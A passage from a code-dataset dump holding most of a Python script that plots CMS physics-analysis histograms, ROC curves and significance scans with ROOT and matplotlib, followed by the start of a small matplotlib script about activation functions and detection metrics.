setupAxes(dummy, xOffset, yOffset, xTitle, yTitle, xLabel, yLabel):\n dummy.SetStats(0)\n dummy.SetTitle(\"\")\n dummy.GetXaxis().SetTitleOffset(xOffset)\n dummy.GetYaxis().SetTitleOffset(yOffset)\n dummy.GetXaxis().SetTitleSize(xTitle)\n dummy.GetYaxis().SetTitleSize(yTitle)\n dummy.GetXaxis().SetLabelSize(xLabel)\n dummy.GetYaxis().SetLabelSize(yLabel)\n if(dummy.GetXaxis().GetNdivisions() % 100 > 5): dummy.GetXaxis().SetNdivisions(6, 5, 0)\n\ndef setupDummy(dummy, leg, histName, xAxisLabel, yAxisLabel, isLogY, xmin, xmax, ymin, ymax, lmax, norm=False, normBkg=False,isRatio=False):\n \n if isRatio:\n setupAxes(dummy, 0, 1.05, 0.0, 0.05, 0.0, 0.05)\n dummy.GetXaxis().SetTitle(\"\")\n \n else: \n setupAxes(dummy, 1.2, 1.6, 0.045, 0.045, 0.045, 0.045)\n dummy.GetXaxis().SetTitle(xAxisLabel)\n \n dummy.GetYaxis().SetTitle(yAxisLabel)\n dummy.SetTitle(histName)\n #Set the y-range of the histogram\n if(isLogY):\n if norm:\n default = 0.00001\n else:\n default = 0.02\n locMin = min(default, max(default, 0.05 * ymin))\n legSpan = (math.log10(3*ymax) - math.log10(locMin)) * (leg.GetY1() - ROOT.gPad.GetBottomMargin()) / ((1 - ROOT.gPad.GetTopMargin()) - ROOT.gPad.GetBottomMargin())\n legMin = legSpan + math.log10(locMin)\n if(math.log10(lmax) > legMin):\n scale = (math.log10(lmax) - math.log10(locMin)) / (legMin - math.log10(locMin))\n if norm:\n ymax = 2.\n else:\n ymax = pow(ymax/locMin, scale)*locMin\n # ymax = 10**8\n # dummy.GetYaxis().SetRangeUser(locMin, 10*ymax)\n dummy.GetYaxis().SetRangeUser(locMin, ymax*10e-5)\n else:\n locMin = 0.0\n legMin = (1.2*ymax - locMin) * (leg.GetY1() - ROOT.gPad.GetBottomMargin()) / ((1 - ROOT.gPad.GetTopMargin()) - ROOT.gPad.GetBottomMargin())\n if(lmax > legMin): ymax *= (lmax - locMin)/(legMin - locMin)\n # dummy.GetYaxis().SetRangeUser(0.0, ymax*1.2)\n dummy.GetYaxis().SetRangeUser(0.0, ymax)\n #set x-axis range\n if(xmin < xmax): dummy.GetXaxis().SetRangeUser(xmin, xmax)\n # print(\"ymax in dummy = \",ymax)\n\ndef makeRocVec(h,reverse=False,ignoreUnderflow=False):\n if h.Integral() > 0.0:\n h.Scale( 1.0 / h.Integral() );\n v, cuts = [], []\n si = 1\n if ignoreUnderflow == True:\n si = -1\n for i in range(si, h.GetNbinsX()+1):\n if reverse:\n val = h.Integral(si, i)\n else:\n val = h.Integral(i, h.GetNbinsX())\n v.append(val)\n cuts.append(h.GetBinLowEdge(i))\n return v, cuts\n\ndef ROCArea(n,mBg,mSig):\n mBgAr = [1] + mBg + [0]\n mSigAr = [0] + mSig + [0]\n gAr = ROOT.TGraph(n, array(\"d\", mBgAr), array(\"d\", mSigAr))\n gArea = round(gAr.Integral(),2) # original way\n # gArea = round(np.trapz(mBgAr,mSigAr),2)\n return gArea\n\ndef drawRocCurve(fType, rocBgVec, rocSigVec, leg, manySigs=False, stList=None, allRocValues=None, baseline=\"baseline\", mainBkg = \"QCD\"):\n # saving all the ROC scores for all signals and backgrounds\n rocValues = pd.DataFrame(columns=[\"cut\",\"var\",\"sig\",\"bkg\",\"roc_auc\",\"cutDir\",\"varCut\",\"cBg\",\"cSig\",\"mBg\",\"mSig\"])\n for mBg, cutBg, lBg, cBg in rocBgVec:\n for mSig, cutSig, lSig, cSig in rocSigVec:\n n = len(mBg)\n gArea = ROCArea(n,mBg,mSig)\n rv = \">=cut\"\n if gArea < 0.5:\n mBg_f = 1 - np.array(mBg)\n mSig_f = 1 - np.array(mSig)\n rv = \"<=cut\"\n gArea = 1 - gArea\n else:\n mBg_f = mBg\n mSig_f = mSig\n rocValues.loc[len(rocValues.index)] = stList + [lSig,lBg,round(gArea,3),rv,cutSig,cBg,cSig,mBg_f,mSig_f]\n allRocValues.loc[len(allRocValues.index)] = stList + [lSig,lBg,round(gArea,3),rv,cutSig,colorDict[cBg],colorDict[cSig],mBg_f,mSig_f]\n if manySigs:\n rocValues = rocValues[rocValues[\"bkg\"] == mainBkg]\n colLabel = \"cSig\"\n varMCLabel = \"sig\"\n mainMC = mainBkg\n else:\n rocValues = rocValues[rocValues[\"sig\"] == baseline]\n colLabel = \"cBg\"\n varMCLabel = \"bkg\"\n mainMC = baseline\n h = []\n for varMC in list(rocValues[varMCLabel]):\n datai = rocValues[rocValues[varMCLabel] == varMC].iloc[0]\n n = len(datai[\"mBg\"])\n g = ROOT.TGraph(n, array(\"d\", datai[\"mBg\"]), array(\"d\", datai[\"mSig\"]))\n rebinx = rebinCalc(n,20)\n for i in range(0,n):\n if i % rebinx == 0:\n latex = ROOT.TLatex(g.GetX()[i], g.GetY()[i],str(round(datai[\"varCut\"][i],2)))\n latex.SetTextSize(0.02)\n latex.SetTextColor(ROOT.kRed)\n g.GetListOfFunctions().Add(latex) # add cut values\n g.SetLineWidth(2)\n g.SetLineColor(datai[colLabel])\n g.SetMarkerSize(0.7)\n g.SetMarkerStyle(ROOT.kFullSquare)\n g.SetMarkerColor(datai[colLabel])\n g.Draw(\"same LP text\")\n leg.AddEntry(g, \"#splitline{\" + fType + \" \" + mainMC + \" vs \" + varMC + \"_\" + datai[\"cutDir\"] + \"}{(\"+\"{:.2f}\".format(datai[\"roc_auc\"])+\")}\", \"LP\")\n h.append(g)\n return h\n\ndef plotSignificance(data, histName, totalBin, xlab, plotOutDir, cut, isLogY=False, rebinx=-1.0, xmin=999.9, xmax=-999.9, reverseCut=False, signifValues=None):\n rocBgVec = []\n histoName = histName + cut\n outputPath = plotOutDir+\"/FOM/\"+cut[1:]\n rebinValue = rebinx # how many bins to merge into 1 bin\n\n # background\n print(\"histoName\",histoName)\n for d in data[1]:\n h = d.getHisto(histoName, rebinx=-1, xmin=xmin, xmax=xmax, fill=True, showEvents=False, overflow=True)\n h.Rebin(rebinValue)\n hIn = h.Integral()\n effList = np.array(makeRocVec(h,reverseCut)[0]) * hIn\n rocBgVec.append([effList])\n\n sigLabelList = []\n # signal\n rocSigVec = []\n for d in data[2]:\n h = d.getHisto(histoName, rebinx=-1, xmin=xmin, xmax=xmax, fill=True, showEvents=False, overflow=True)\n h.Rebin(rebinValue)\n hIn = h.Integral()\n eff = np.array(makeRocVec(h,reverseCut)[0])\n effList = eff * hIn\n rocSigVec.append([effList,d.legEntry()])\n sigLabelList.append(d.legEntry())\n cutValues = np.array(makeRocVec(h)[1])\n\n B = np.zeros(len(cutValues))\n for rbv in rocBgVec:\n B += rbv[0]\n\n fomList = []\n normedfomList = []\n normedcutList = []\n cutList = []\n\n colorList = ['b','g','r','c','m','y']\n lineStyles = [\"solid\",\"dashed\",\"dotted\"]\n # comparing the locations of maximum FOM for different signals\n fig = plt.figure(figsize=(12,8))\n ax = plt.subplot(111)\n for i in range(len(rocSigVec)):\n rsv = rocSigVec[i]\n fo = fom(rsv[0],B)\n foReal = np.ma.masked_invalid(fo)\n fomList.append(foReal)\n maxFOM = foReal.max()\n normedfomList.append(foReal/maxFOM)\n cutList.append(cutValues)\n newEntry = [cut,histName.replace(\"h_\",\"\"),rsv[1],maxFOM]\n signifValues.loc[len(signifValues.index)] = newEntry\n lstyle = \"solid\"\n mstyle = \"o\"\n if i > len(colorList) - 1:\n lstyle = \"dashed\"\n mstyle = \"D\"\n if i > len(colorList)*2 - 1:\n lstyle = \"^\"\n ax.plot(cutValues[:-1],foReal[1:]/maxFOM,label=rsv[1] + \" ({:.1e})\".format(maxFOM), marker=mstyle, linestyle=lstyle, color=colorList[i%len(colorList)])\n\n pltTitle = \">= cut\"\n if reverseCut:\n pltTitle = \"<= cut\"\n\n ax.plot(cutList[0][:-1],np.ma.masked_invalid(normedfomList).mean(axis=0)[1:],label=\"Average\",linewidth=5,alpha=0.5,color=\"black\")\n ax.set_title(pltTitle)\n ax.legend(loc='upper right', fontsize=12, ncol=3)\n ax.set_ylabel(\"Normalized FOM ( sqrt(2((S+B)*log(1+S/B)-S)) )\")\n ax.set_xlabel(xlab)\n ax.set_ylim(0,1.5)\n plt.savefig(outputPath + \"/FOM_\" + histoName+\".png\")\n\n # # comparing signal efficiency for different signals\n # plt.figure(figsize=(12,8))\n # for i in range(len(sEffList)):\n # seff = sEffList[i]\n # siglab = sigLabelList[i]\n # plt.step(cutList[i],seff,label=siglab)\n # plt.legend()\n # plt.ylabel(\"Signal Efficiency\")\n # plt.xlabel(xlab)\n # plt.grid()\n # plt.savefig(outputPath + \"/sigEff_\" + histoName+\".png\")\n\n # # comparing FOM and signal efficiency for each signal\n # for i in range(len(sigLabelList)):\n # slabel = sigLabelList[i]\n # foms = fomList[i]\n # cutValues = cutList[i]\n # seffs = sEffList[i]\n #\n # fig, ax1 = plt.subplots()\n #\n # color = 'red'\n # ax1.set_xlabel(xlab)\n # ax1.set_ylabel(\"FOM: sqrt(2((S+B)*log(1+S/B)-S))\")\n # ax1.step(cutValues,foms,color=color)\n # ax1.tick_params(axis='y',labelcolor=color)\n #\n # ax2 = ax1.twinx()\n #\n # color = 'blue'\n # ax2.set_ylabel('Signal Efficiency', color=color)\n # ax2.step(cutValues,seffs,color=color)\n # ax2.tick_params(axis='y',labelcolor=color)\n #\n # fig.tight_layout()\n # # for some reason, the x grid line is just not showing right, that's why we have the following code\n # for cut in np.arange(min(cutValues),max(cutValues),50):\n # plt.vlines(cut,0,max(seffs),color=\"silver\",linewidth=0.5)\n # plt.grid()\n # plt.savefig(outputPath + \"/FOMSEff_\" + histoName + \"_\" + slabel + \".png\")\n\n plt.close()\n\n\n\n\ndef plotROC(data, histoName, outputPath=\"./\", isLogY=False, xmin=999.9, xmax=-999.9, norm=False, manySigs=False, stList=None, allRocValues=None):\n #This is a magic incantation to disassociate opened histograms from their files so the files can be closed\n ROOT.TH1.AddDirectory(False)\n\n #create the canvas for the plot\n c1 = ROOT.TCanvas( \"c\", \"c\", 800, 800)\n\n c1.cd()\n\n ROOT.gPad.Clear()\n ROOT.gStyle.SetOptStat(\"\")\n ROOT.gPad.SetLeftMargin(0.15)\n ROOT.gPad.SetRightMargin(0.05)\n ROOT.gPad.SetTopMargin(0.08)\n ROOT.gPad.SetBottomMargin(0.12)\n ROOT.gPad.SetTicks(1,1)\n ROOT.gPad.SetLogy(isLogY)\n\n #Create TLegend\n leg = ROOT.TLegend(0.17, 0.72, 0.95, 0.88)\n #nColumns = 3 if(len(data[1]) >= 3) else 1\n nColumns = 2\n leg.SetFillStyle(0)\n leg.SetBorderSize(0)\n leg.SetLineWidth(1)\n leg.SetNColumns(nColumns)\n leg.SetTextFont(42)\n ROOT.gStyle.SetLegendTextSize(0.024)\n\n rocBgVec = []\n for d in data[1]:\n h = d.getHisto(histoName, rebinx=-1, xmin=xmin, xmax=xmax, fill=True, showEvents=False, overflow=False)\n rocBgVec.append(makeRocVec(h) + ( d.legEntry(), d.getColor()))\n\n rocSigVec = []\n for d in data[2]:\n h = d.getHisto(histoName, rebinx=-1, xmin=xmin, xmax=xmax, fill=True, showEvents=False, overflow=False)\n rocSigVec.append(makeRocVec(h) + (d.legEntry(), d.getColor()))\n\n #create a dummy histogram to act as the axes\n ymax=1.0\n ymin=10**-4\n lmax=1.0\n dummy = ROOT.TH1D(\"dummy\", \"dummy\", 1000, 0.0, 1.0)\n setupDummy(dummy, leg, \"\", \"#epsilon_{ bg}\", \"#epsilon_{ sg}\", isLogY, xmin, xmax, ymin, ymax, lmax)\n # print(\"ymax = \",ymax)\n dummy.Draw(\"hist\")\n leg.Draw(\"same\")\n print(histoName)\n history = drawRocCurve(\"\", rocBgVec, rocSigVec, leg, manySigs, stList, allRocValues)\n\n line1 = ROOT.TF1( \"line1\",\"1\",0,1)\n line1.SetLineColor(ROOT.kBlack)\n line1.Draw(\"same\")\n line2 = ROOT.TF1( \"line2\",\"x\",0,1)\n line2.SetLineColor(ROOT.kBlack)\n line2.SetLineStyle(ROOT.kDotted)\n line2.Draw(\"same\")\n\n dummy.Draw(\"AXIS same\")\n # dummy.GetXaxis().SetRangeUser(0,0.1)\n # dummy.SetMinimum(0.8)\n # dummy.SetMaximum(1.1)\n # CMS label\n CMS_lumi.writeExtraText = 1\n lumi = \"59.7\"\n\n CMS_lumi.lumi_sqrtS = lumi + \" fb^{-1} (13 TeV)\"\n\n iPeriod = 0\n iPos = 0\n\n CMS_lumi.CMS_lumi(c1, iPeriod, iPos)\n c1.cd()\n c1.Update();\n c1.RedrawAxis()\n\n c1.SaveAs(outputPath+\"/\"+histoName+\"_ROC.png\")\n c1.Close()\n del c1\n del leg\n\ndef createRatio(h1, h2, xtitle):\n h3 = h1.Clone(\"h3\"+xtitle)\n h3.SetLineColor(ROOT.kBlack)\n h3.SetMarkerStyle(20)\n h3.SetMarkerSize(1)\n h3.SetMarkerColor(ROOT.kBlack)\n h3.SetTitle(\"\")\n \n h3.SetMinimum(0)\n h3.SetMaximum(2)\n\t# Set up plot for markers and errors\n\t#h3.Sumw2()\n h3.SetStats(0)\n h3.Divide(h2)\n # ymax = h3.GetMaximumBin()\n # print(\"ymax in create Ratio = \",ymax)\n # h3.SetMaximum(ymax)\n\t# Adjust y-axis settings\n x = h3.GetXaxis()\n y = h3.GetYaxis()\n \n x.SetTitleOffset(0.65)\n y.SetTitleOffset(0.27)\n x.SetTitleSize(0.2)\n y.SetTitleSize(0.15)\n x.SetLabelSize(0.13)\n y.SetLabelSize(0.13)\n x.SetTitle(xtitle)\n # print(\"xtitle\",xtitle)\n y.SetTitle(\"Data/MC\")\n\n if(x.GetNdivisions() % 100 > 5): x.SetNdivisions(6, 5, 0)\n\n y.SetNdivisions(505)\n\n # y.SetTitleFont(43)\n \n # y.SetLabelFont(43)\n \n # x.SetTitleFont(43)\n # x.SetLabelFont(43)\n # x.SetLabelOffset(0.05)\n\n return h3\n\ndef createCanvasPads(c,isLogY):\n\t# Upper histogram plot is pad1\n # eps = 0.005\n pad1 = ROOT.TPad(\"pad1\", \"pad1\", 0, 0.3, 1.0, 0.97)\n pad1.SetBottomMargin(0.01) # joins upper and lower plot\n pad1.SetLeftMargin(0.10)\n pad1.SetRightMargin(0.05)\n pad1.SetTopMargin(0.1)\n # pad1.SetBottomMargin(0.12)\n pad1.SetTicks(1,1)\n pad1.SetLogy(isLogY)\n pad1.Draw()\n # Lower ratio plot is pad2\n c.cd() # returns to main canvas before defining pad2\n pad2 = ROOT.TPad(\"pad2\", \"pad2\", 0, 0.0, 1.0, 0.3)\n pad2.SetTopMargin(0) # joins upper and lower plot\n # pad2.SetBottomMargin(0.3)\n pad2.SetLeftMargin(0.10)\n pad2.SetRightMargin(0.05)\n # pad2.SetTopMargin(0.08)\n pad2.SetBottomMargin(0.35)\n pad2.SetTicks(1,1)\n pad2.SetGrid()\n pad2.Draw()\n\n return c, pad1, pad2\n\n\ndef plotStack(data, histoName, totalBin, outputPath=\"./\", xTitle=\"\", yTitle=\"\", isLogY=False, xmin=999.9, xmax=-999.9, norm=False, normBkg=False, onlySig=False, stList=None, yieldValues=None, isRatio=False):\n #This is a magic incantation to disassociate opened histograms from their files so the files can be closed\n ROOT.TH1.AddDirectory(False)\n # print(\"Data in plot stack = \",data)\n #create the canvas for the plot\n \n \n if isRatio:\n c1 = ROOT.TCanvas( \"c\", \"c\", 800, 700)\n c1, pad1, pad2 = createCanvasPads(c1,isLogY)\n pad1.cd()\n else:\n c1 = ROOT.TCanvas( \"c\", \"c\", 800, 800)\n c1.cd()\n ROOT.gPad.Clear()\n ROOT.gPad.SetLeftMargin(0.15)\n ROOT.gPad.SetRightMargin(0.05)\n ROOT.gPad.SetTopMargin(0.08)\n ROOT.gPad.SetBottomMargin(0.12)\n ROOT.gPad.SetTicks(1,1)\n ROOT.gPad.SetLogy(isLogY)\n \n ROOT.gStyle.SetOptStat(\"\")\n\n #Create TLegend\n leg = ROOT.TLegend(0.17, 0.7, 0.95, 0.88)\n #nColumns = 3 if(len(data[1]) >= 3) else 1\n nColumns = 2\n leg.SetFillStyle(0)\n leg.SetBorderSize(0)\n leg.SetLineWidth(1)\n leg.SetNColumns(nColumns)\n leg.SetTextFont(42)\n if isRatio:\n ROOT.gStyle.SetLegendTextSize(0.05)\n else: \n ROOT.gStyle.SetLegendTextSize(0.024)\n \n #Setup background histos\n rebinx = rebinCalc(totalBin,40)\n # print(\"rebinx = \",rebinx)\n hs = ROOT.THStack()\n hMC = None\n firstPass = True\n bkghist = None\n history = []\n \n # setup background histos\n # print(\"before setup bkg histos detail key = {}, {}, {}\".format(histoName,xmin, xmax))\n for d in data[1]:\n h = d.getHisto(histoName, rebinx=rebinx, xmin=xmin, xmax=xmax, fill=True, showEvents=True)\n if (stList != None) and (not normBkg):\n newEntry = stList + [getLabel(d.legEntry()),round(h.Integral())]\n yieldValues.loc[len(yieldValues.index)] = newEntry\n # print(newEntry)\n if normBkg:\n normHisto(h, True)\n h.SetLineWidth(3)\n h.SetFillStyle(3955) \n hs.Add(copy.deepcopy(h))\n leg.AddEntry(h, d.legEntry(), \"F\")\n # bkghist += h\n if(firstPass):\n hMC = copy.deepcopy(h)\n bkghist = h\n firstPass = False\n else:\n hMC.Add(copy.deepcopy(h))\n bkghist.Add(h)\n\n \n\n print(\"hs = \", hs)\n print(\"hMC = \",hMC)\n # there is a bug with getBGHistos. Once fixed, can delete lines 294-305, and uncomment\n # the line below and lines 313-314\n # hs, hMC, hList = getBGHistos(data, histoName, rebinx, xmin, xmax)\n if norm:\n normHisto(hMC, True)\n #Fill background legend\n # for h in hList:\n # leg.AddEntry(h[0], h[1], \"F\")\n\n #create a dummy histogram to act as the axes\n if norm:\n ymax=10**1\n ymin=10**-12\n lmax=10**1\n else:\n ymax=10**11\n ymin=10**-4\n lmax=10**12\n dummy = ROOT.TH1D(\"dummy\", \"dummy\", 1000, hMC.GetBinLowEdge(1), hMC.GetBinLowEdge(hMC.GetNbinsX()) + hMC.GetBinWidth(hMC.GetNbinsX()))\n setupDummy(dummy, leg, \"\", xTitle, yTitle, isLogY, xmin, xmax, ymin, ymax, lmax, norm, normBkg,isRatio)\n # print(\"near setup dummy detail key = {}, {}, {}\".format(histoName,xmin, xmax))\n \n # setupDummy(dummy, leg, histoName, xTitle, yTitle, isLogY, xmin, xmax, ymin, ymax, lmax, norm, normBkg)\n if normBkg:\n dummy.SetMaximum(100)\n dummy.SetMinimum(0.00001)\n dummy.Draw(\"hist\")\n if norm:\n hMC.Draw(\"hist same\")\n leg.Clear()\n leg.AddEntry(hMC, \"Total Background\", \"L\")\n elif normBkg:\n hs.Draw(\"nostackHIST same\")\n hs.SetMaximum(100)\n hs.SetMinimum(0.00001)\n elif onlySig:\n leg.Clear()\n else:\n hs.Draw(\"hist F same\")\n leg.Draw(\"same\")\n\n # print(\"detail key = {}, {}, {}\".format(histoName,xmin, xmax))\n \n #Setup signal histos\n \n sig = 0.0\n linestylenumber = 0\n linestyle = [ROOT.kSolid,ROOT.kDashed,ROOT.kDotted]\n if(data[2]):\n #firstPass=True\n for d in data[2]:\n h = d.getHisto(histoName, rebinx=rebinx, xmin=xmin, xmax=xmax, showEvents=True)\n if (stList != None) and (not normBkg):\n newEntry = stList + [getLabel(d.legEntry()),round(h.Integral())]\n yieldValues.loc[len(yieldValues.index)] = newEntry\n # print(\"Signal = \",newEntry)\n #if(firstPass):\n sig = round(simpleSig(h, hMC),2)\n #firstPass=False\n #print(d.legEntry(), round(simpleSig(h, hMC),2))\n # h.SetLineStyle(ROOT.kDashed)\n h.SetLineStyle(linestyle[linestylenumber%3] )\n linestylenumber+=1\n h.SetLineWidth(3)\n leg.AddEntry(h, d.legEntry()+\", {}\".format(sig), \"L\")\n if norm or normBkg:\n normHisto(h, True)\n h.Draw(\"hist same\")\n history.append(h)\n \n # Setup data histogram\n if(data[0]):\n for d in data[0]:\n datahist = d.getHisto(histoName, rebinx=rebinx,xmin=xmin,xmax=xmax,showEvents=True)\n if (stList != None) and (not normBkg):\n newEntry = stList + [getLabel(d.legEntry()),round(datahist.Integral())] # For the yield value calculation\n yieldValues.loc[len(yieldValues.index)] = newEntry\n # print(\"Data = \",newEntry)\n #firstPass=False\n ROOT.gStyle.SetErrorX(0.)\n datahist.SetMarkerStyle(20)\n datahist.SetMarkerSize(1)\n datahist.SetLineColor(ROOT.kBlack)\n leg.AddEntry(datahist, d.legEntry(), \"P\")\n # if norm or normBkg:\n # normHisto(datahist, True)\n datahist.Draw(\"P same\")\n dhist = datahist\n history.append(datahist)\n # Print ratio plot\n if isRatio:\n pad2.cd()\n # print(\"bkghist = \",bkghist)\n # setupAxes(dummy, 1.2, 1.6, 0.045, 0.045, 0.045, 0.045)\n ratio = createRatio(datahist,bkghist,xTitle)\n ratio.Draw(\"EX0P\")\n\n\n\n \n\n #Draw significance\n significance = ROOT.TLatex()\n significance.SetNDC(True)\n significance.SetTextAlign(11)\n significance.SetTextFont(52)\n significance.SetTextSize(0.030)\n #significance.DrawLatex(0.45, 0.72, (\"Significance = #frac{N_{s}}{#sqrt{N_{b}+#left(0.3N_{b}#right)^{2}}} = \"+str(sig)))\n #significance.DrawLatex(0.45, 0.72, (\"Significance = #frac{N_{s}}{#sqrt{N_{b}+#left(0.3N_{b}#right)^{2}}}\"))\n\n if onlySig:\n dummy.SetMaximum(10**8)\n dummy.Draw(\"AXIS same\")\n\n # ran = [870, 2385.0]\n # vl = ROOT.TLine(ran[0],0,ran[0],10**6)\n # vl.SetLineWidth(2)\n # vl.SetLineColor(ROOT.kRed)\n # vl.Draw(\"same\")\n # vl2 = ROOT.TLine(ran[1],0,ran[1],10**6)\n # vl2.SetLineWidth(2)\n # vl2.SetLineColor(ROOT.kRed)\n # vl2.Draw(\"same\")\n # CMS label\n CMS_lumi.writeExtraText = 1\n lumi = \"59.7\"\n\n CMS_lumi.lumi_sqrtS = lumi + \" fb^{-1} (13 TeV)\"\n\n iPeriod = 0\n iPos = 0\n\n CMS_lumi.CMS_lumi(c1, iPeriod, iPos)\n c1.cd()\n c1.Update();\n c1.RedrawAxis()\n\n if norm:\n c1.SaveAs(outputPath+\"/\"+histoName+\"_norm.png\")\n elif normBkg:\n c1.SaveAs(outputPath+\"/\"+histoName+\"_normBkg.png\")\n else:\n c1.SaveAs(outputPath+\"/\"+histoName+\".png\")\n\n c1.Close()\n del c1\n del leg\n del hMC\n\ndef main():\n parser = optparse.OptionParser(\"usage: %prog [options]\\n\")\n parser.add_option('-b', dest='isNormBkg', action=\"store_true\", help=\"Normalized Background and Signal plots\")\n parser.add_option('-d', '--dataset', dest='dataset', default='testHadd_11242020', help='dataset')\n parser.add_option('-j', '--jNVar', help='make histograms for nth jet variables', dest='jNVar', default=False, action='store_true')\n parser.add_option('-m', dest='manySigs', action=\"store_true\", help=\"Plot ROC curves with many signals vs. QCD\")\n parser.add_option('-n', dest='isNorm', action=\"store_true\", help=\"Normalize stack plots\")\n parser.add_option('-s', dest='onlySig', action=\"store_true\", help=\"Plot only signals\")\n parser.add_option('-y', dest='year', type='string', default='2018', help=\"Can pass in the run year\")\n parser.add_option('-o', dest='outputdir', type='string', help=\"Output folder name\")\n # parser.add_optio\n options, args = parser.parse_args()\n\n year = options.year\n # cuts = [\"\", \"_ge2AK8j\", \"_ge2AK8j_lp6METrST\", \"_ge2AK8j_l1p5dEta12\", \"_baseline\"]\n #cuts = [\"_ge2AK8j\"]\n # cutsImportant = [\"_qual_trg_st\",\"_qual_trg_st_0nim\",\"_qual_trg_st_ge1nim\"]\n # cutsImportant = [\"\",\"_2PJ\",\"_2PJ_nl\",\"_qual_trg_2PJ\", \"_qual_trg_st_2PJ\"]\n # cutsImportant = [\"\",\"_2PJ\",\"_2PJ_nl\",\"_qual_trg_2PJ\",\"_qual_trg_st_2PJ\",\"_qual_trg_st_ht_2PJ_dphimin\"]\n # cutsImportant = [\"_cr\"]\n # cutsImportant = [\"issue_ht\",\"_issue_met\"]\n cutsImportant = [\"_cr_muon\",\"_cr_electron\"]\n \n\n\n Data, sgData, bgData = getData(\"condor/\" + options.dataset + \"/\", 1.0, year)\n \n # print(sgData)\n #Data, sgData, bgData = getData(\"condor/MakeNJetsDists_\"+year+\"/\", 1.0, year)\n allRocValues = pd.DataFrame(columns=[\"cut\",\"var\",\"sig\",\"bkg\",\"roc_auc\",\"cutDir\",\"cutSig\",\"cBg\",\"cSig\",\"mBg_f\",\"mSig_f\"])\n yieldValues = pd.DataFrame(columns=[\"cut\",\"var\",\"source\",\"yield\"])\n signifValues = pd.DataFrame(columns=[\"cut\",\"var\",\"source\",\"max signif.\"])\n if options.outputdir:\n plotOutDir = \"output/{}\".format(options.outputdir)\n else: \n plotOutDir = \"output/{}\".format(options.dataset)\n\n preVars = {\n \"h_njets\":False,\n \"h_njetsAK8\":False,\n \"h_nb\":False,\n \"h_ht\":False,\n \"h_st\":False,\n \"h_met\":False,\n # \"h_mT\":True,\n # \"h_METrHT_pt30\":False,\n # \"h_METrST_pt30\":False,\n # \"h_dEtaj12AK8\":True,\n # \"h_dRJ12AK8\":True,\n # \"h_dPhij1METAK8\":False,\n # \"h_dPhij2METAK8\":False,\n # \"h_dPhij1rdPhij2AK8\":False,\n # \"h_dPhiMinjMETAK8\":False,\n # \"h_dEtaj12\":True,\n # \"h_dRJ12\":True,\n # \"h_dPhij1MET\":False,\n # \"h_dPhij2MET\":False,\n # \"h_dPhij1rdPhij2\":True,\n # \"h_dPhiMinjMET\":True,\n # \"h_mT2_f4_msm\":False,\n # \"h_mT2_f4_msm_dEta\":False,\n # \"h_mT2_f4_msm_dPhi\":False,\n # \"h_mT2_f4_msm_dR\":False,\n }\n varsSkip = [\n \"eCounter\",\n \"evtw\",\n \"jw\",\n \"fjw\"\n ]\n\n# myvars = key : [\"xlabel\", no. of bins, xmin,xmax, npzinfo, flattenInfo, weightName]\n \n for histName,details in vars(options.jNVar).items():\n # for histName, details in myVars.items():\n # print(histName)\n # print(details)\n isNorm = options.isNorm\n isNormBkg = options.isNormBkg\n onlySig = options.onlySig\n manySigs = options.manySigs\n if histName in varsSkip:\n continue\n #if details[6] != \"evtw\":\n # continue\n for cut in cutsImportant:\n makeDirs(plotOutDir,cut,\"Stacked\")\n makeDirs(plotOutDir,cut,\"roc\")\n makeDirs(plotOutDir,cut,\"FOM\")\n makeDirs(plotOutDir,cut,\"NormedStacked\")\n stList = [cut,histName]\n # print(\"Data = \",Data)\n # plotROC( (Data, bgData, sgData), \"h_\"+histName+cut, plotOutDir+\"/roc/\"+cut[1:], isLogY=False, manySigs=manySigs, stList=stList, allRocValues=allRocValues)\n # plotStack((Data, bgData, sgData), \"h_\"+histName+cut, details[1], plotOutDir+\"/Stacked/\"+cut[1:], details[0], \"Events\", isLogY=True, norm=isNorm, xmin=details[2], xmax=details[3], normBkg=False, onlySig=onlySig, stList=stList, yieldValues=yieldValues,isRatio=False)\n plotStack((Data, bgData, sgData), \"h_\"+histName+cut, details[1], plotOutDir+\"/Stacked/\"+cut[1:], details[0], \"Events\", isLogY=True,norm=isNorm, xmin=details[2], xmax=details[3], normBkg=False, onlySig=onlySig, stList=stList, yieldValues=yieldValues,isRatio=True)\n # plotStack((Data, bgData, sgData), \"h_\"+histName+cut, details[1], plotOutDir+\"/NormedStacked/\"+cut[1:], details[0], \"Events\", isLogY=True, norm=isNorm, xmin=details[2], xmax=details[3], normBkg=True, onlySig=onlySig, stList=stList, yieldValues=yieldValues)\n if histName in preVars.keys():\n plotSignificance((Data, bgData, sgData), \"h_\"+histName, details[1], details[0], plotOutDir, cut, isLogY=False, reverseCut=preVars[histName], signifValues=signifValues)\n yieldValues.to_csv(\"{}/yieldValues.csv\".format(plotOutDir))\n signifValues.to_csv(\"{}/signifValues.csv\".format(plotOutDir))\n allRocValues.to_csv(\"{}/allRocValues.csv\".format(plotOutDir))\n # print(yieldValues)\n\nif __name__ == '__main__':\n main()\n","repo_name":"alpana-hep/t-channel_Analysis","sub_path":"plotStack.py","file_name":"plotStack.py","file_ext":"py","file_size_in_byte":42091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"28972944691","text":"import matplotlib.pyplot as plt \nimport numpy as np \nimport math \n\nplt.style.use('seaborn-whitegrid')\nfont = {'size' : 17}\n\nplt.rc('font', **font)\n\n\nx = np.linspace(-10, 10, 100) \n# Sigmoid function\nsigmoid = 1/(1 + np.exp(-x))\n# Divergence of Sigmoid function\ndiv_sigmoid = np.exp(-x)/np.power(1 + np.exp(-x),2)\n \n# Tanh function\ntanh = 2/(1+np.exp(-2*x)) - 1\n# Divergence of tanh function\ndiv_tanh = 4*np.exp(-2*x)/np.power(1 + np.exp(-2*x),2)\n\n# RelU function\nrelu = np.maximum(0,x)\n# Divergence of ReLU function\ndiv_relu = np.sign(x)/2+0.5\n\nx_point = np.linspace(-10,10,5)\n# y expected\ny = np.array((1,2,3,4,5))\n# y predicted\ny_predicted = np.array((3,7,4,1,5))\n# loss values\nj = 0.5*np.power(y-y_predicted,2)\n\nlabels = [\"Wearing a hardhat\", \"Not wearing a hardhat\", \"Wearing a safety vest\", \"Not wearing a safety vest\", \"Wearing a mask\", \"Not wearing a mask\"]\nm_3_precision = [0.7297297297297297, 0.8783783783783784, 0.9324324324324325, 0.7432432432432432, 0.8175675675675675, 0.3716216216216216]\nm_3_recall = [0.8558558558558558, 0.6621621621621622, 0.8513513513513513, 0.7162162162162162, 0.47747747747747743, 0.6486486486486487]\nx_pos = np.arange(len(labels))\n# plt.plot(x, sigmoid, 'r', label = \"Sigmoid(x)\")\n# plt.plot(x, div_sigmoid, 'b', label = 